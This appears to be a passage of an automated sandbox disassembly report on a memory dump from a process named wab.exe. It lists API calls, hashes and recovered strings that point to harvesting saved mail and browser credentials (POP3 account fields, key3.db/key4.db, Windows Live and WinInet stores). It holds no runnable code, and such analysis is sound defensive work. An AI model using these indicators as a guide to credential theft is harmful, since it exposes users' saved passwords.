                                      • API ID: AddressProc$FreeLibraryLoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                      • String ID: J$Microsoft_WinInet
                                      • API String ID: 2203907242-260894208
                                      • Opcode ID: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                      • Instruction ID: 28b95496509cbb6d8c3a882eeb8be19e6e579a4afcb86d24d1cb248b0f397b1b
                                      • Opcode Fuzzy Hash: 123b9c113c62e2732d222d76ca296a8e2b2539d047cdc4c6dd048264b325ab7f
                                      • Instruction Fuzzy Hash: 9E5127B16083469FD710EF65C981A5BB7E8FF89304F40492EF998D3251EB38E944CB5A
                                      APIs
                                      • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                      • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410916
                                      • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                      • memcpy.MSVCRT ref: 00410961
                                      Strings
                                      • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                      • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410911
                                      • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                      • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 0041091E
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FromStringUuid$memcpy
                                      • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                      • API String ID: 2859077140-2022683286
                                      • Opcode ID: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                      • Instruction ID: 9e6d0ab6f4d779539f8eb1da53a4fb6c135c1230b89e6f6df403d509513a9b08
                                      • Opcode Fuzzy Hash: abdaa11197fe0e36068712593a832dde72f9d49fceae32f26c9e946e83c56665
                                      • Instruction Fuzzy Hash: AD1151B391011DAAEF11EEA5DC80EEB37ACAB45350F040027F951E3251E6B4D9458BA5
                                      APIs
                                        • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                                      • _mbscpy.MSVCRT ref: 00409686
                                      • _mbscpy.MSVCRT ref: 00409696
                                      • GetPrivateProfileIntA.KERNEL32(0045A550,rtl,00000000,0045A448), ref: 004096A7
                                        • Part of subcall function 00409278: GetPrivateProfileStringA.KERNEL32(0045A550,?,0044C52F,0045A5A0,?,0045A448), ref: 00409293
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: PrivateProfile_mbscpy$AttributesFileString
                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                      • API String ID: 888011440-2039793938
                                      • Opcode ID: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                      • Instruction ID: 35163425d10a67bbe8c9c36fe52ba00322d2719519e04c12929343b9a05e3383
                                      • Opcode Fuzzy Hash: 0e79880e1a595b11c4c54fae987beab4c47f6ff888ef6c0570b87c08ce61dc62
                                      • Instruction Fuzzy Hash: 51F09621EC021636EA113A315C47F6E75148F91B16F1546BBBD057B2C3EA6C8D21819F
                                      APIs
                                      Strings
                                      • database %s is already in use, xrefs: 0042E9CE
                                      • database is already attached, xrefs: 0042EA97
                                      • too many attached databases - max %d, xrefs: 0042E951
                                      • attached databases must use the same text encoding as main database, xrefs: 0042EAE6
                                      • cannot ATTACH database within transaction, xrefs: 0042E966
                                      • unable to open database: %s, xrefs: 0042EBD6
                                      • out of memory, xrefs: 0042EBEF
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                      • API String ID: 1297977491-2001300268
                                      • Opcode ID: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                      • Instruction ID: 706ac67067754653a22c48b2dfc2d31ecc94a00d4abf430cd75191e688397775
                                      • Opcode Fuzzy Hash: 79cb3876c2fc92d661153f2d5ae8e07f357d02a67bcab47e18a9ae982f962df5
                                      • Instruction Fuzzy Hash: E5A1BFB16083119FD720DF26E441B1BBBE0BF84314F54491FF8998B252D778E989CB5A
                                      APIs
                                        • Part of subcall function 00403138: GetPrivateProfileStringA.KERNEL32(00000000,?,0044C52F,?,?,?), ref: 0040315C
                                      • strchr.MSVCRT ref: 0040327B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: PrivateProfileStringstrchr
                                      • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                      • API String ID: 1348940319-1729847305
                                      • Opcode ID: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                      • Instruction ID: 3c3f6fb7771655520bf9db4259302bbcc59fb1a7701990a2e81aa7d88bec6f27
                                      • Opcode Fuzzy Hash: b5df54f4728cfba1fc6d3682f37c83209c501ebf9394a37894307d593f194734
                                      • Instruction Fuzzy Hash: 6C31A07094024EBEEF119F60CC45FDABF6CAF14319F10806AB59C7A1D1C7B99B948B54
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy
                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                      • API String ID: 3510742995-3273207271
                                      • Opcode ID: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                      • Instruction ID: 550cffa583b2c54ba2aa88b33b5e976ebd7c1d4e5c49a3816a9e471e7c07ee5b
                                      • Opcode Fuzzy Hash: f9ae4bccd643c252e3d2802759cb712313e1c03ba6bda263eb3b4f79a5d554f2
                                      • Instruction Fuzzy Hash: D501D4B2FC86E428FA3006450C46FE74E4547BFB11F350017F78525AA5A09D0DC7816F
                                      APIs
                                        • Part of subcall function 004070AE: GetVersionExA.KERNEL32(0045A3B0,0000001A,00410DD9,00000104), ref: 004070C8
                                      • memset.MSVCRT ref: 0040FA1E
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040FA35
                                      • _strnicmp.MSVCRT ref: 0040FA4F
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA7B
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040FA9B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                      • String ID: WindowsLive:name=*$windowslive:name=
                                      • API String ID: 945165440-3589380929
                                      • Opcode ID: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                      • Instruction ID: 67e4bc7d9cc92e77f49167b45697c8bd07ba2e516c4687fa62adfbc1007618b4
                                      • Opcode Fuzzy Hash: d76308cf3b0539381bda6f4980a48b5ab9a4ebba73adfb730004608c6550dc67
                                      • Instruction Fuzzy Hash: D1418BB1508345AFC720DF24D88496BB7ECEB85304F004A3EF99AA3691D738DD48CB66
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: _mbscpy$sprintfstrchrstrlen
                                      • String ID: %s@gmail.com
                                      • API String ID: 3902205911-4097000612
                                      • Opcode ID: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                      • Instruction ID: 26c7b24e36a56a715c82424c63065c573d607dcbd7bcbeb2789f412f71db7656
                                      • Opcode Fuzzy Hash: 74159e27bd978c3f9cb24cdd3adb322da0b0d12deb1a375656cb0fbfbc9e6cd0
                                      • Instruction Fuzzy Hash: 2F21AEF290415C5AEB11DB95DCC5FDAB7FCEB54308F0405ABF108E3181EA78AB888B65
                                      APIs
                                      • memset.MSVCRT ref: 004094C8
                                      • GetDlgCtrlID.USER32(?), ref: 004094D3
                                      • GetWindowTextA.USER32(?,?,00001000), ref: 004094E6
                                      • memset.MSVCRT ref: 0040950C
                                      • GetClassNameA.USER32(?,?,000000FF), ref: 0040951F
                                      • _strcmpi.MSVCRT ref: 00409531
                                        • Part of subcall function 0040937A: _itoa.MSVCRT ref: 0040939B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memset$ClassCtrlNameTextWindow_itoa_strcmpi
                                      • String ID: sysdatetimepick32
                                      • API String ID: 3411445237-4169760276
                                      • Opcode ID: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                      • Instruction ID: 275a188ed2e8c4d5dd974f468a7d06fe6df33147f8fd952053c2ef98a917a35b
                                      • Opcode Fuzzy Hash: d298131e59c589d759801c5718a5716a1bfbc5a0205dba439accd7a9806c0ec0
                                      • Instruction Fuzzy Hash: 2D11E773C051297EEB129754DC81EEF7BACEF5A315F0400B6FA08E2151E674DE848A64
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A31
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A47
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A5F
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405A7A
                                      • EndDialog.USER32(?,00000002), ref: 00405A96
                                      • EndDialog.USER32(?,00000001), ref: 00405AA9
                                        • Part of subcall function 00405737: GetDlgItem.USER32(?,000003E9), ref: 00405745
                                        • Part of subcall function 00405737: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 0040575A
                                        • Part of subcall function 00405737: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405776
                                      • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405AC1
                                      • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405BC9
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Item$DialogMessageSend
                                      • String ID:
                                      • API String ID: 2485852401-0
                                      • Opcode ID: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                      • Instruction ID: 49f8b46d81ffaaf96d74304be2fa091063820ac2067ea90d1efd1f4607779086
                                      • Opcode Fuzzy Hash: ec9303a4946bc0e02ff46f830e49cd5227634f9872e1f7ef617901a07ad17536
                                      • Instruction Fuzzy Hash: BC619230600A45ABEB21AF65C8C5A2BB7A5EF40718F04C23BF515A76D1E778EA50CF58
                                      APIs
                                      • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040B3DC
                                      • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040B411
                                      • LoadImageA.USER32(00000085,00000000,00000010,00000010,00001000), ref: 0040B446
                                      • LoadImageA.USER32(00000086,00000000,00000010,00000010,00001000), ref: 0040B462
                                      • GetSysColor.USER32(0000000F), ref: 0040B472
                                      • DeleteObject.GDI32(?), ref: 0040B4A6
                                      • DeleteObject.GDI32(00000000), ref: 0040B4A9
                                      • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 0040B4C7
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: MessageSend$DeleteImageLoadObject$Color
                                      • String ID:
                                      • API String ID: 3642520215-0
                                      • Opcode ID: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                      • Instruction ID: 78997c319ae04cc2c464f68e1b112159c67c6e7e05dd954700a2b997fe6bb290
                                      • Opcode Fuzzy Hash: 3f6f34f20c78ecfe39199dd04a8c69320b349886d0faf46357142e58b0488c36
                                      • Instruction Fuzzy Hash: 5A317275680308BFFA715B70DC87FD6B695EB48B00F104828F3857A1E1CAF279909B68
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                      • String ID:
                                      • API String ID: 2313361498-0
                                      • Opcode ID: c48968d120a8350dafd0b05c892d8c8183d7a77208ced883aa7f681ff77c883e
                                      • Instruction ID: 76b7db47255e00c5a16d586f34bfaf53fe76d4163934589152c5d70c184cfcdd
                                      • Opcode Fuzzy Hash: c48968d120a8350dafd0b05c892d8c8183d7a77208ced883aa7f681ff77c883e
                                      • Instruction Fuzzy Hash: AF31B3B1500605AFEB24AF69CC85E2AF7A8FF44354B00853FF55AE76A1D778EC408B94
                                      APIs
                                      • GetClientRect.USER32(?,?), ref: 0040BB33
                                      • GetWindowRect.USER32(?,?), ref: 0040BB49
                                      • GetWindowRect.USER32(?,?), ref: 0040BB5C
                                      • BeginDeferWindowPos.USER32(00000003), ref: 0040BB79
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040BB96
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040BBB6
                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040BBDD
                                      • EndDeferWindowPos.USER32(?), ref: 0040BBE6
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: Window$Defer$Rect$BeginClient
                                      • String ID:
                                      • API String ID: 2126104762-0
                                      • Opcode ID: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                      • Instruction ID: 10c9609a041f1aae696d54cc03c31aacdb7ad71aa251d7cd9d71944ddb51ea6f
                                      • Opcode Fuzzy Hash: 79eb62364e7a0dcd77e9d411930711777f01ecf57ddd8cbf010404b9f010fc5c
                                      • Instruction Fuzzy Hash: 4521C376A00209FFDB518FE8DD89FEEBBB9FB08700F144065FA55A2160C771AA519B24
                                      APIs
                                      • GetSystemMetrics.USER32(00000011), ref: 004072E7
                                      • GetSystemMetrics.USER32(00000010), ref: 004072ED
                                      • GetDC.USER32(00000000), ref: 004072FB
                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 0040730D
                                      • GetDeviceCaps.GDI32(004012E4,0000000A), ref: 00407316
                                      • ReleaseDC.USER32(00000000,004012E4), ref: 0040731F
                                      • GetWindowRect.USER32(004012E4,?), ref: 0040732C
                                      • MoveWindow.USER32(004012E4,?,?,?,?,00000001,?,?,?,?,?,?,004012E4,?), ref: 00407371
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: CapsDeviceMetricsSystemWindow$MoveRectRelease
                                      • String ID:
                                      • API String ID: 1999381814-0
                                      • Opcode ID: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                      • Instruction ID: 22bb5f5faf33eb927601db2df5736372c6ae1ca5e65390263d5238b88a5d6584
                                      • Opcode Fuzzy Hash: 5011a2be71f5844cc92965472a983066776558f1b2f7244de85e539227eebf35
                                      • Instruction Fuzzy Hash: C611A536E00219AFDF008FF9DC49BAE7FB9EB44311F040175EE05E3290DA70A8418A90
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpymemset
                                      • String ID: abort due to ROLLBACK$out of memory$statement aborts at %d: [%s] %s$string or blob too big$unknown error
                                      • API String ID: 1297977491-3883738016
                                      • Opcode ID: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                      • Instruction ID: e5ed660087d787d4baabea17299805ba1702756b87ddf288a6169370bd8562d9
                                      • Opcode Fuzzy Hash: 5be73647a144ebf5748a75f3c436a574a9202e5f864b3081d31fa7a4dfb760c6
                                      • Instruction Fuzzy Hash: FA128D75A00629DFCB14DF68E480AADBBB1BF08314F65409BE945AB341D738F981CF99
                                      APIs
                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044955B
                                        • Part of subcall function 00449550: memset.MSVCRT ref: 0044956B
                                        • Part of subcall function 00449550: memcpy.MSVCRT ref: 004495C8
                                        • Part of subcall function 00449550: memcpy.MSVCRT ref: 00449616
                                      • memcpy.MSVCRT ref: 0044972E
                                      • memcpy.MSVCRT ref: 0044977B
                                      • memcpy.MSVCRT ref: 004497F6
                                        • Part of subcall function 00449260: memcpy.MSVCRT ref: 00449291
                                        • Part of subcall function 00449260: memcpy.MSVCRT ref: 004492DD
                                      • memcpy.MSVCRT ref: 00449846
                                      • memcpy.MSVCRT ref: 00449887
                                      • memcpy.MSVCRT ref: 004498B8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpy$memset
                                      • String ID: gj
                                      • API String ID: 438689982-4203073231
                                      • Opcode ID: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                      • Instruction ID: 4698d9130898d2a28bd34890c38a7d1df91d0c58a43dc6add7b2b2ec2d892026
                                      • Opcode Fuzzy Hash: 832627842ba8dc90b88f641ae0f393e23f8c73a82c86ca3b23e3764f0db7e7b3
                                      • Instruction Fuzzy Hash: AB71C9B35083448BE310EF65D88069FB7E9BFD5344F050A2EE98997301E635DE09C796
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: __aulldvrm$__aullrem
                                      • String ID: -$-x0$0123456789ABCDEF0123456789abcdef
                                      • API String ID: 643879872-978417875
                                      • Opcode ID: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                      • Instruction ID: 9a4dcd4671c0eaaf570ced65c0a394ff57d12b60ca94b612a12fd923c93321e5
                                      • Opcode Fuzzy Hash: b74aa8b09285f319ac94010cbb77161464d88d468cab547f1369814aecdf9254
                                      • Instruction Fuzzy Hash: 09618C315083819FD7218F2886447ABBBE1AFC6704F18495FF8C4D7352D3B8C9998B4A
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: memcpymemset$strlen$_memicmp
                                      • String ID: user_pref("
                                      • API String ID: 765841271-2487180061
                                      • Opcode ID: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                      • Instruction ID: f707cbd7524a382ab05823b92859e6f0e78dc23985d18c56f1e7f2c379abc130
                                      • Opcode Fuzzy Hash: 90d77a8e642e16426f01af40e3455a1a28465a86fb6cd763409838de826d4489
                                      • Instruction Fuzzy Hash: 0B4175769041189AD714DBA5DC81FDA77ACAF44314F1042BBA605B7181EA38AB49CFA8
                                      APIs
                                      • GetDlgItem.USER32(?,000003E9), ref: 00405827
                                      • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 00405840
                                      • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 0040584D
                                      • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 00405859
                                      • memset.MSVCRT ref: 004058C3
                                      • SendMessageA.USER32(?,00001019,?,?), ref: 004058F4
                                      • SetFocus.USER32(?), ref: 00405976
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: MessageSend$FocusItemmemset
                                      • String ID:
                                      • API String ID: 4281309102-0
                                      • Opcode ID: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                      • Instruction ID: c72ca3e99ea405196032a5824f130882485a5617ada8e3d881518c79e7018221
                                      • Opcode Fuzzy Hash: 1e065b1851f46eedf46acd576a64098092c66e4320400e0dd2798a55d04b3de4
                                      • Instruction Fuzzy Hash: 4241F8B5900209AFDB20DF94DC81EAEBBB9EF04358F1440AAE908B7291D7759E50DF94
                                      APIs
                                        • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                        • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040AB7D,?,<item>), ref: 00406D4D
                                      • _mbscat.MSVCRT ref: 0040A8FF
                                      • sprintf.MSVCRT ref: 0040A921
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FileWrite_mbscatsprintfstrlen
                                      • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                      • API String ID: 1631269929-4153097237
                                      • Opcode ID: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                      • Instruction ID: 568bce87a3ef0860ab630a318aded4c5cbf938598f8cce33e7c60ad495c5b4cb
                                      • Opcode Fuzzy Hash: 1edff87013eeafc9988ac017b7f9a6f14c9cca9b6a50fb5f6e60c21e7938a174
                                      • Instruction Fuzzy Hash: 88318F32900208AFDF15DF94C886EDE7BB5FF44314F11416AF911BB2A2D779A951CB84
                                      APIs
                                      • memset.MSVCRT ref: 0040810E
                                        • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                        • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                        • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                        • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                      • LocalFree.KERNEL32(?,?,?,?,?,00000000,75B4EB20,?), ref: 004081B9
                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                        • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                        • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                      • String ID: POP3_credentials$POP3_host$POP3_name
                                      • API String ID: 524865279-2190619648
                                      • Opcode ID: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                      • Instruction ID: 3679de1ec208362151a8ef0ee52fb8317fff865e06d3e7d86d66f539d2f4ec3f
                                      • Opcode Fuzzy Hash: b5524387b823faeaa267b2a2291d9d9c6f1165028c5fc642f3f58ff6b69592da
                                      • Instruction Fuzzy Hash: 5331507594021DAFDB11DB698C81EEEBB7CEF59304F0040BAF904A3141D6349A458F64
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: strlen$_mbscat_mbscpymemset
                                      • String ID: key3.db$key4.db
                                      • API String ID: 581844971-3557030128
                                      • Opcode ID: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                      • Instruction ID: ca97bc5828a50012869c36cbd7bca65918f6b78bc9695587552fe8d314e031cf
                                      • Opcode Fuzzy Hash: 1b23ff19475b214b98e9218dd91c9d20610f24d325a1d0b0b24a5ae2e44b1aaa
                                      • Instruction Fuzzy Hash: 4B210E3190811D6ADB10AA65DC41ECE77ACDB55318F1104BBF40DF60A1EE38DA958658
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: ItemMenu$CountInfomemsetstrchr
                                      • String ID: 0$6
                                      • API String ID: 2300387033-3849865405
                                      • Opcode ID: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                      • Instruction ID: cca6cfeb93ac41a34237a001b959014c3c2918908c2e54b2122eb51ea62ba4e3
                                      • Opcode Fuzzy Hash: f43f1b6a3e30ed785ddb3ece00de2359a070e4505b5746840cef8f2021710bea
                                      • Instruction Fuzzy Hash: CC21AB7240C384AFD710CF61C881A9BB7E8FB89344F44093EF68896292E779DD45CB5A
                                      APIs
                                      • memcpy.MSVCRT ref: 004108C3
                                      • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                      • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                      • memcpy.MSVCRT ref: 00410961
                                      Strings
                                      • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041090A
                                      • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 004108FD
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.2581780895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_17_2_400000_wab.jbxd
                                      Similarity
                                      • API ID: FromStringUuidmemcpy
                                      • String ID: 220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F
                                      • API String ID: 2685851527-202910704
                                      • Opcode ID: 2e7b2f23232dd97abd622906eae07d5a1462dc252c060d9f172839e787d8b35b
